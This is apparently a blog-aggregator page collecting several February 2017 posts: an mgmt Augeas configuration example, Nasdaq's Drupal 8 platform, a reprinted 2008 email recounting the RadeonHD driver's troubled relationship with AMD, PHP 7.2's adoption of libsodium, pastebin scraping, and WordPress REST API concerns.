I will blog later about the prometheus support, today I will focus about the Augeas resource.

Defining a resource

Currently, mgmt does not have a DSL, it only uses plain yaml.

Here is how you define an Augeas resource:

---
graph: mygraph
resources:
  augeas:
  - name: sshd_config
    lens: Sshd.lns
    file: "/etc/ssh/sshd_config"
    sets:
      - path: X11Forwarding
        value: no
edges:

As you can see, the augeas resource takes several parameters:

  • lens: the lens file to load
  • file: the path to the file that we want to change
  • sets: the paths/values that we want to change

Setting file will create a Watcher, which means that each time you change that file, mgmt will check if it is still aligned with what you want.

Code

The code can be found there: https://github.com/purpleidea/mgmt/pull/128/files

We are using go bindings for Augeas: https://github.com/dominikh/go-augeas/ Unfortunately, those bindings only support a recent version of Augeas. It was needed to vendor it to make it build on travis.

Future plans

Future plans regarding this resource is to add some parameters, probably a parameter to use as Puppet “onlyif” parameter, and a “rm” parameter.

February 13, 2017

Nasdaq CIO and vice president Brad Peterson at the Acquia Engage conference showing the Drupal logo on Nasdaq's MarketSite billboard at Times Square NYC

Last October, I shared the news that Nasdaq Corporate Solutions has selected Acquia and Drupal 8 for its next generation Investor Relations and Newsroom Website Platforms. 3,000 of the largest companies in the world, such as Apple, Amazon, Costco, ExxonMobil and Tesla are currently eligible to use Drupal 8 for their investor relations websites.

How does Nasdaq's investor relations website platform work?

First, Nasdaq developed a "Drupal 8 distribution" that is optimized for creating investor relations sites. They started with Drupal 8 and extended it with both contributed and custom modules, documentation, and a default Drupal configuration. The result is a version of Drupal that provides Nasdaq's clients with an investor relations website out-of-the-box.

Next, Nasdaq decided to offer this distribution "as-a-service" to all of their publicly listed clients through Acquia Cloud Site Factory. By offering it "as-a-service", Nasdaq's customers don't have to worry about installing, hosting, upgrading or maintaining their investor relations site. Nasdaq's new IR website platform also ensures top performance, scalability and meets the needs of strict security and compliance standards. Having all of these features available out-of-the-box enables Nasdaq's clients to focus on providing their stakeholders with critical news and information.

Offering Drupal as a web service is not a new idea. In fact, I have been talking about hosted service models for distributions since 2007. It's a powerful model, and Nasdaq's Drupal 8 distribution as-a-service is creating a win-win-win-win. It's good for Nasdaq's clients, good for Nasdaq, good for Drupal, and in this case, good for Acquia.

It's good for Nasdaq's customers because it provides them with a platform that incorporates the best of both worlds; it gives them the maintainability, reliability, security and scalability that comes with a cloud offering, while still providing the innovation and freedom that comes from using Open Source.

It is great for Nasdaq because it establishes a business model that leverages Open Source. It's good for Drupal because it encourages Nasdaq to invest back into Drupal and their Drupal distribution. And it's obviously good for Acquia as well, because we get to sell our Acquia Site Factory Platform.

If you don't believe me, take Nasdaq's word for it. In the video below, which features Stacie Swanstrom, executive vice president and head of Nasdaq Corporate Solutions, you can see how Nasdaq pitches the value of this offering to their customers. Swanstrom explains that with Drupal 8, Nasdaq's IR Website Platform brings "clients the advantages of open source technology, including the ability to accelerate product enhancements compared to proprietary platforms".

Soon it will be a decade since we started the RadeonHD driver, where we pushed ATI to a point of no return, got a proper C coded graphics driver and freely accessible documentation out. We all know just what happened to this in the end, and i will make a rather complete write-up spanning multiple blog entries over the following months. But while i was digging out backed up home directories for information, i came across this...

It is a copy of the content of an email i sent to an executive manager at SuSE/Novell, a textfile called bridgmans_games.txt. This was written in July 2008, after the RadeonHD project gained what was called "Executive oversight". After the executive had first hand seen several of John Bridgmans games, he asked me to provide him with a timeline of some of the games he played with us. The below explanation covers only things that i knew that this executive was not aware of, and it covers a year of RadeonHD development^Wstruggle, from July 2007 until april 2007. It took me quite a while to compile this, and it was a pretty tough task mentally, as it finally showed, unequivocally, just how we had been played all along. After this email was read by this executive, he and my department lead took me to lunch and told me to let this die out slowly, and to not make a fuss. Apparently, I should've counted myself lucky to see these sort of games being played this early on in my career.

This is the raw copy, and only the names of some people, who are not in the public eye have been redacted out (you know who you are), some other names were clarified. All changes are marked with [].

These are:
SuSE Executive manager: [EXEC]
SuSE technical project manager: [TPM]
AMD manager (from a different department than ATI): [AMDMAN]
AMD liaison: [SANTA] (as he was the one who handed me and Egbert Eich a 1 cubic meter box full of graphics cards ;))

[EXEC], i made a rather extensive write-up about the goings-on throughout 
the whole project. I hope this will not intrude too much on your time, 
please have a quick read through it, mark what you think is significant and 
where you need actual facts (like emails that were sent around...) Of 
course, this is all very subjective, but for most of this emails can be 
provided to back things up (some things were said on the weekly technical 
call only).

First some things that happened beforehand...

Before we came around with the radeonhd driver, there were two projects 
going
already...

One was Dave Airlie who claimed he had a working driver for ATI Radeon R500
hardware. This was something he wrote during 2006, from information under 
NDA, and this nda didn't allow publication. He spent a lot of time bashing 
ATI for it, but the code was never seen, even when the NDA was partially 
lifted later on.

The other was a project started in March 2007 by Nokia's Daniel Stone and
Ubuntu's [canonical's] Matthew Garreth. The avivo driver. This driver was a
driver separate from the -ati or -radeon drivers, under the GPL, and written
from scratch by tracing the BIOS and tracking register changes [(only the
latter was true)]. Matthew and Daniel were only active contributors for the
first few weeks and quickly lost interest. The bulk of the development was
taken over by Jerome Glisse after that.

Now... Here is where we encounter John [Bridgman]...

Halfway july, when we first got into contact with Bridgman, he suddenly 
started bringing up AtomBIOS. When then also we got the first lowlevel 
hardware spec, but when we asked for hardware details, how the different 
blocks fitted together, we never got an answer as that information was said 
to not be available. We also got our hands on some of the atombios 
interpreter code, and a rudimentary piece of documentation explaining how to 
handle the atombios bytecode. So Matthias [Hopf] created an atombios 
disassembler to help us write up all the code for the different bits. And 
while we got some further register information when we asked for it, 
bridgman kept pushing atombios relentlessly.

This whining went on and on, until we, late august, decided to write up a
report of what problems we were seeing with atombios, both from an interface 
as from an actual implementation point of view. We never got even a single 
reply to this report, and we billed AMD 10 or so mandays, and [with] 
bridgman apparently berated, as he never brought the issue up again for the 
next few months... But the story of course didn't end there of course.

At the same time, we wanted to implement one function from atomBIOS at the
time: ASICInit. This function brings the hardware into a state where
modesetting can happen. It replaces a full int10 POST, which is the 
standard, antique way of bringing up VGA on IBM hardware, and ASICInit 
seemed like a big step forward. John organised a call with the BIOS/fglrx 
people to explain to us what ASICInit offered and how we could use it. This 
is the only time that Bridgman put us in touch with any ATI people directly. 
The proceedings of the call were kind of amusing... After 10 minutes or so, 
one of the ATI people said "for fglrx, we don't bother with ASICInit, we 
just call the int10 POST". John then quickly stated that they might have to 
end the call because apparently other people were wanting to use this 
conference room. The call went on for at least half an hour longer, and john 
from time to time stated this again. So whether there was truth to this or 
not, we don't know, it was a rather amusing coincidence though, and we of 
course never gained anything from the call.

Late august and early september, we were working relentlessly towards 
getting our driver into a shape that could be exposed to the public. 
[AMDMAN] had warned us that there was a big marketing thing planned for the 
kernel summit in september, but we never were told any of this through our 
partner directly. So we were working like maniacs on getting the driver in a 
state so that we could present it at the X Developers Summit in Cambridge.

Early september, we were stuck on several issues because we didn't get any
relevant information from Bridgman. In a mail sent on september 3, [TPM] 
made the following statement: "I'm not willing to fall down to Mr. B.'s mode 
of working nor let us hold up by him. They might (or not) be trying to stop 
the train - they will fail." It was very very clear then already that things 
were not being played straight.

Bridgman at this point was begging to see the code, so we created a copy of 
a (for us) working version, and handed this over on september the 3rd as 
well. We got an extensive review of our driver on a very limited subset of 
the hardware, and we were mainly bashed for producing broken modes (monitor 
synced off). This had of course nothing to do with us using direct 
programming, as this was some hardware limits [PLL] that we eventually had 
to go and find ourselves. Bridgman never was able to help provide us with 
suitable information on what the issue could be or what the right limits 
were, but the fact that the issue wasn't to be found in atombios versus 
direct programming didn't make him very happy.

So on the 5th of september, ATI went ahead with its marketing campaign, the 
one which we weren't told about at all. They never really mentioned SUSE's 
role in this, and Dave Airlie even made a blog entry stating how he and Alex 
were the main actors on the X side. The SUSE role in all of this was 
severely downplayed everywhere, to the point where it became borderline 
insulting. It was also one of the first times where we really felt that 
Bridgman maybe was working more closely with Dave and Alex than with us.

We then had to rush off to the X Developers Summit in Cambridge. While we 
met ATIs Matthew Tippett and Bridgman beforehand, it was clear that our role 
in this whole thing was being actively downplayed, and the attitude towards 
egbert and me was predominantly hostile. The talk bridgman and Tippett gave 
at XDS once again fully downplayed our effort with the driver. During our 
introduction of the radeonHD driver, John Bridgman handed Dave Airlie a CD 
with the register specs that went around the world, further reducing our 
relevance there. John stated, quite noisily, in the middle of our 
presentation, that he wanted Dave to be the first to receive this 
documentation. Plus, it became clear that Bridgman was very close to Alex 
Deucher.

The fact that we didn't catch all supper/dinner events ourselves worked 
against us as well, as we were usually still hacking away feverishly at our 
driver. We also had to leave early on the night of the big dinner, as we had 
to come back to nürnberg so that we could catch the last two days of the 
Labs conference the day after. This apparently was a mistake... We later 
found a picture (http://flickr.com/photos/cysglyd/1371922101/) that has the 
caption "avivo de-magicifying party". This shows Bridgman, Tippett, Deucher, 
all the redhat and intel people in the same room, playing with the (then 
competing) avivo driver. This picture was taken while we were on the plane 
back to nürnberg. Another signal that, maybe, Mr Bridgman isn't every 
committed to the radeonhd driver. Remarkably though, the main developer 
behind the avivo driver, Jerome Glisse, is not included here. He was found 
to be quite fond of the radeonhd driver and immediately moved on to 
something else as his goal was being achieved by radeonhd now.

On monday the 17th, right before the release, ATI was throwing up hurdles... 
We suddenly had to put AMD copyright statements on all our code, a 
requirement never made for any AMD64 work which is as far as i understood 
things also invalid under german copyright law. This was a tough nut for me 
to swallow, as a lot of the code in radeonhd modesetting started life 5years 
earlier in my unichrome driver. Then there was the fact that the atombios 
header didn't come with an acceptable license and copyright statement, and a 
similar situation for the atombios interpreter. The latter two gave Egbert a 
few extra hours of work that night.

I contacted the phoronix.com owner (Michael Larabel) to talk to him about an 
imminent driver release, and this is what he stated: "I am well aware of the 
radeonHD driver release today through AMD and already have some articles in 
the work for posting later today." The main open source graphics site had 
already been given a story by some AMD people, and we were apparently not 
supposed to be involved here. We managed to turn this article around there 
and then, so that it painted a more correct picture of the situation. And 
since then, we have been working very closely with Larabel to make sure that 
our message gets out correctly.

The next few months seemed somewhat uneventful again. We worked hard on 
making our users happy, on bringing our driver up from an initial 
implementation to a full featured modesetting driver. We had to 
painstakingly try to drag more information out of John, but mostly find 
things out for ourselves. At this time the fact that Dave Airlie was under 
NDA still was mentioned quite often in calls, and John explained that this 
NDA situation was about to change. Bridgman also brought up that he had 
started the procedure to hire somebody to help him with documentation work 
so that the flow of information could be streamlined. We kind of assumed 
that, from what we saw at XDS, this would be Alex Deucher, but we were never 
told anything.

Matthias got in touch with AMDs GPGPU people through [AMDMAN], and we were 
eventually (see later) able to get TCore code (which contains a lot of very
valuable information for us) out of this. Towards the end of oktober, i 
found an article online about AMDs upcoming Rv670, and i pasted the link in 
our radeonhd irc channel. John immediately fired off an email explaining 
about the chipset, apologising for not telling us earlier. He repeated some 
of his earlier promises of getting hardware sent out to us quicker. When the 
hardware release happened, John was the person making statements to the open 
source websites (messing up some things in the process), but [SANTA] was the 
person who eventually sent us a board.

Suddenly, around the 20th of november, things started moving in the radeon
driver. Apparently Alex Deucher and Dave Airlie had been working together 
since November 3rd to add support for r500 and r600 hardware to the radeon 
driver. I eventually dug out a statement on fedora devel, where redhat guys, 
on the last day of oktober, were actively refusing our driver from being 
accepted. Dave Airlie stated the following: "Red Hat and Fedora are 
contemplating the future wrt to AMD r5xx cards, all options are going to be 
looked at, there may even be options that you don't know about yet.."

They used chunks of code from the avivo driver, chunks of code from the
radeonhd driver (and the bits where we spent ages finding out what to do), 
and they implemented some parts of modesetting using AtomBIOS, just like 
Bridgman always wanted it. On the same day (20th) Alex posted a blog entry 
about being hired by ATI as an open source developer. Apparently, Bridgman 
mentioned that Dave had found something when doing AtomBIOS on the weekly 
phonecall beforehand. So Bridgman had been in close communication with Dave 
for quite a while already.

Our relative silence and safe working ground was shattered. Suddenly it was
completely clear that Bridgman was playing a double game. As some diversion
mechanisms, John now suddenly provided us with the TCore code, and suddenly
gave us access to the AMD NDA website, and also told us on the phone that 
Alex is not doing any Radeon work in his worktime and only does this in his 
spare time. Surely we could not be against this, as surely we too would like 
to see a stable and working radeon driver for r100-r400. He also suddenly 
provided those bits of information Dave had been using in the radeon driver, 
some of it we had been asking for before and never got an answer to then.

We quickly ramped up the development ourselves and got a 1.0.0 driver 
release out about a week later. John in the meantime was expanding his 
marketing horizon, he did an interview with the Beyond3D website (there is 
of course no mention about us), and he started doing some online forums 
(phoronix), replying to user posts there, providing his own views on 
"certain" situations (he has since massively increased his time on that 
forum).

One interesting result of the competing project is that suddenly we were
getting answers to questions we had been asking for a long time. An example 
of such an issue is the card internal view of where the cards own memory 
resides. We spent weeks asking around, not getting anywhere, and suddenly 
the registers were used in the competing driver, and within hours, we got 
the relevant information in emails from Mr Bridgman (November 17 and 20, 
"Odds and Ends"). Bridgman later explained that Dave Airlie knew these 
registers from his "previous r500 work", and that Dave asked Bridgman for 
clearance for release, which he got, after which we also got informed about 
these registers as well. The relevant commit message in the radeon driver 
predates the email we received with the related information by many hours.

[AMDMAN] had put us in touch with the GPGPU people from AMD, and matthias 
and one of the GPGPU people spent a lot of time emailing back and forth. But
suddenly, around the timeframe where everything else happened (competing
driver, alex getting hired), John suddenly conjured up the code that the 
GPGPU people had all along: TCore. This signalled to us that John had caught 
our plan to bypass him, and that he now took full control of the situation. 
It took about a month before John made big online promises about how this 
code could provide the basis for a DRM driver, and that it would become 
available to all soon. We managed to confirm, in a direct call with both the 
GPGPU people and Mr Bridgman that the GPGPU people had no idea about that 
John intended to make this code fully public straigth away. The GPGPU people 
assumed that Johns questions were fully aimed at handing us the code without 
us getting tainted, not that John intended to hand this out publically 
immediately. To this day, TCore has not surfaced publically, but we know 
that several people inside the Xorg community have this code, and i 
seriously doubt that all of those people are under NDA with AMD.

Bridgman also ramped up the marketing campaign. He did an interview with
Beyond3D.com on the 30th where he broadly smeared out the fact that a 
community member was just hired to work with the community. John of course 
completely overlooked the SUSE involvement in everything. An attempt to 
rectify this with an interview of our own to match never materialised due to 
the heavy time constraints we are under.

On the 4th of december, a user came to us asking what he should do with a
certain RS600 chipset he had. We had heard from John that this chip was not
relevant to us, as it was not supposed to be handled by our driver (the way 
we remember the situation), but when we reported this to John, he claimed 
that he thought that this hardware never shipped and that it therefor was 
not relevant. The hardware of course did ship, to three different vendors, 
and Egbert had to urgently add support for it in the I2C and memory 
controller subsystems when users started complaining.

One very notable story of this time is how the bring-up of new hardware was
handled. I mentioned the Rv670 before, we still didn't get this hardware at
this point, as [SANTA] was still trying to get his hands on this. What we 
did receive from [SANTA] on the 11th of december was the next generation 
hardware, which needed a lot of bring-up work: rv620/rv635. This made us 
hopeful that, for once, we could have at least basic support in our driver 
on the same day the hardware got announced. But a month and a half later, 
when this hardware was launched, John still hadn't provided any information. 
I had quite a revealing email exchange with [SANTA] about this too, where he 
wondered why John was stalling this. The first bit of information that was 
useful to us was given to us on February the 9th, and we had to drag a lot 
of the register level information out of John ourselves. Given the massive 
changes to the hardware, and the induced complications, it of course took us 
quite some time to get this work finished. And this fact was greedily abused 
by John during the bring-up time and afterwards. But what he always 
overlooks is that it took him close to two months to get us documentation to 
use even atombios successfully.

The week of december the 11th is also where Alex was fully assimilated into
ATI. He of course didn't do anything much in his first week at AMD, but in 
his second week he started working on the radeon driver again. In the weekly 
call then John re-assured us that Alex was doing this work purely in his 
spare time, that his task was helping us get the answers we needed. In all 
fairness, Alex did provide us with register descriptions more directly than 
John, but there was no way he was doing all this radeon driver work in his 
spare time. But it would take John another month to admit it, at which time 
he took Alex working on the radeon driver as an acquired right.

Bridgman now really started to spend a lot of time on phoronix.com. He 
posted what i personally see as rather biased comparisons of the different 
drivers out there, and he of course beat the drums heavily on atombios. This 
is also the time where he promised the TCore drop.

Then games continued as usual for the next month or so, most of which are
already encompassed in previous paragraphs.

One interesting sidenote is that both Alex and John were heavy on rebranding
AtomBIOS. They actively used the word scripts for the call tables inside
atombios, and were actively labelling C modesetting code as legacy. Both 
quite squarely go in against the nature of AtomBIOS versus C code.

Halfway february, discussions started to happen again about the RS690 
hardware. Users were having problems. After a while, it became clear that 
the RS690, all along, had a display block called DDIA capable of driving a 
DVI digital signal. RS690 was considered to be long and fully supported, and 
suddenly a major display block popped into life upon us. Bridgmans excuse 
was the same as with the RS600; he thought this never would be used in the 
first place and that therefor we weren't really supposed to know about this.

On the 23rd and 24th of February, we did FOSDEM. As usual, we had an X.org 
Developers Room there, for which i did most of the running around. We worked
with Michael Larabel from phoronix to get the talks taped and online. 
Bridgman gave us two surprises at FOSDEM... For one, he released 3D 
documentation to the public, we learned about this just a few days before, 
we even saw another phoronix statement about TCore being released there and 
then, but this never surfaced.

We also learned, on friday evening, that the radeon driver was about to gain
Xvideo support for R5xx and up, through textured video code that alex had 
been working on. Not only did they succeed in stealing the sunshine away 
from the actual hard work (organising fosdem, finding out and implementing 
bits that were never supposed to be used in the first place, etc), they gave 
the users something quick and bling and showy, something we today still 
think was provided by others inside AMD or generated by a shader compiler. 
And this to the competing project.

At FOSDEM itself Bridgman of course was full of stories. One of the most
remarkable ones, which i overheard when on my knees clearing up the 
developers room, was bridgman talking to the Phoronix guy and some community 
members, stating that people at ATI actually had bets running on how long it 
would take Dave Airlie to implement R5xx 3D support for the radeon driver. 
He said this loudly, openly and with a lot of panache. But when this support 
eventually took more than a month, i took this up with him on the phonecall, 
leading of course to his usual nervous laughing and making up a bit of a 
coverstory again.

Right before FOSDEM, Egbert had a one-on-one phonecall with Bridgman, hoping 
to clear up some things. This is where we first learned that bridgman had 
sold atombios big time to redhat, but i think you now know this even better 
than i do, as i am pretty hazy on details there. Egbert, if i remember 
correctly, on the very same day, had a phonecall with redhat's Kevin Martin 
as well. But since nothing of this was put on mail and i was completely 
swamped with organising FOSDEM, i have no real recollection of what came out 
of that.

Alex then continued with his work on radeon, while being our only real 
point of contact for any information. There were several instances where our 
requests for information resulted in immediate commits to the radeon driver, 
where issues were fixed or bits of functionality were added. Alex also ended 
up adding RENDER acceleration to the radeon driver, and when Bridgman was in
Nuernberg, we clearly saw how Bridgman sold this to his management: alex was
working on bits that were meant to be ported directly to RadeonHD.

In march, we spent our time getting rv620/635 working, dragging information,
almost register per register out of our friends. We learned about the 
release of RS780 at CEBIT, meaning that we had missed yet another 
opportunity for same day support. John had clearly stated, at the time of 
the rv620/635 launch that "integrated parts are the only place where we are 
'officially' trying to have support in place at or very shortly after 
launch".

And with that, we pretty much hit the time frame when you, [EXEC], got
involved...

One interesting kind of new development is Kgrids. Kgrids is some code 
written by some ATI people that has some useful information for driver 
development, especially useful for the DRM. John Bridgman told the phoronix 
author 2-3 weeks ago already that he had this, and that he was planning to 
release this immediately. The phoronix author immediately informed me, but 
the release of this code never happened so far. Last thursday, Bridgman 
brought up Kgrids in the weekly technical phonecall already... When asked 
how long he knew about this, he admitted that they knew about this for 
several weeks already, which makes me wonder why we weren't informed 
earlier, and why we suddenly were informed then...


As said, the above, combined with what already was known to this executive, and the games he saw being played first hand from april 2008 throughout june 2008, marked the start of the end of the RadeonHD project.

I too more and more disconnected myself from development on this, with Egbert taking the brunt of the work. I instead spent more time on the next SuSE enterprise release, having fun doing something productive and with a future. Then, after FOSDEM 2009, when 24 people at the SuSE Nuernberg office were laid off, i was almost relieved to be amongst them.

Time flies.

February 12, 2017

The post PHP 7.2 to get modern cryptography into its standard library appeared first on ma.ttias.be.

This actually makes PHP the first language, over Erlang and Go, to get a secure crypto library in its core.

Of course, having the ability doesn't necessarily mean it gets used properly by developers, but this is a major step forward.

The vote for the Libsodium RFC has been closed. The final tally is 37 yes,0 no.

I'll begin working on the implementation with the desired API (sodium_*instead of \Sodium\*).

Thank you for everyone who participated in these discussions over the past year or so and, of course, everyone who voted for better cryptography inPHP 7.2.

Scott Arciszewski

@CiPHPerCoder

Source: php.internals: [RFC][Vote] Libsodium vote closes; accepted (37-0)

As a reminder, the Libsodium RFC:

Title: PHP RFC: Make Libsodium a Core Extension

Libmcrypt hasn't been touched in eight years (last release was in 2007), leaving openssl as the only viable option for PHP 5.x and 7.0 users.

Meanwhile, libsodium bindings have been available in PECL for a while now, and has reached stability.

Libsodium is a modern cryptography library that offers authenticated encryption, high-speed elliptic curve cryptography, and much more. Unlike other cryptography standards (which are a potluck of cryptography primitives; i.e. WebCrypto), libsodium is comprised of carefully selected algorithms implemented by security experts to avoid side-channel vulnerabilities.

Source: PHP RFC: Make Libsodium a Core Extension

The post PHP 7.2 to get modern cryptography into its standard library appeared first on ma.ttias.be.

Pastebin.com is one of my favourite playground. I’m monitoring the content of all pasties posted on this website. My goal is to find juicy data like configurations, database dumps, leaks of credentials. Sometimes you can find also malicious binary files.

For sure, I knew that I’m not the only one to have interests in the pastebin.com content.  Plenty of researchers or organizations like CERT’s and SOC’s are doing the same but I was very surprised by the number of hits that I got on my latest pastie:

Pastebin Hits

For the purpose of my last ISC diary, I posted some data on pastebin.com and did not communicate the link by any mean. Before posting the diary, I had a quick look at my pastie and it had already 105 unique views! It was posted only a few minutes before., think twice before posting data to

Conclusion: Think twice before posting data to pastebin. Even if you delete quickly your pastie, there are chances that it will be already scrapped by many robots (and mine! ;-))

[The post Think Twice before Posting Data on Pastebin! has been first published on /dev/random]

I published the following diary on isc.sans.org: “Analysis of a Suspicious Piece of JavaScript“.

What to do on a cloudy lazy Sunday? You go hunting and review some alerts generated by your robots. Pastebin remains one of my favourite playground and you always find interesting stuff there. In a recent diary, I reported many malicious PE files stored in Base64 but, today, I found a suspicious piece of JavaScript code… [Read more]

[The post [SANS ISC Diary] Analysis of a Suspicious Piece of JavaScript has been first published on /dev/random]

February 11, 2017

After the PR-beating WordPress took with the massive defacements of non-upgraded WordPress installations, it is time to revisit the point-of-view of the core-team that the REST API should be active for all and that no option should be provided to disable it (as per the decisions not options philosophy). I for one installed the “Disable REST API” plugin.

YouTube Video
Watch this video on YouTube.